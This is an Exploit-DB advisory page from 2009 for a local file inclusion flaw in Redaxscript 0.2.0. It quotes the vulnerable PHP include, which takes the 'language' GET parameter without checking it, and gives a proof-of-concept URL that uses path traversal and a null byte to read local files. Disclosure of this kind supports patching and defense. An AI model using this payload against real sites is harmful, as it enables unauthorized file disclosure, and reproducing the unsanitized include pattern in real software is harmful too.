Redaxscript 0.2.0 (language) Local File Inclusion Vulnerability



EDB-ID: 8395 CVE: N/AOSVDB-ID: 53587
Author: SirGodPublished: 2009-04-10Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
##################################################################################
[+] Redaxscript 0.2.0 (index.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##################################################################################
[+] Local File Inclusion
  index.php :
-----------------------------------------------------------------
include('template/'.$_SESSION[_root.'template'].'/index.php');
-----------------------------------------------------------------
  function.php :
-----------------------------------------------------------------
if($_GET['language']) {
		$_SESSION[_root.'language'] = $_GET['language'];
-----------------------------------------------------------------
 - PoC :
    http://127.0.0.1/index.php?language=../../../../../BOOTSECT.BAK%00
##################################################################################
# milw0rm.com [2009-04-10]






Comments

No comments so far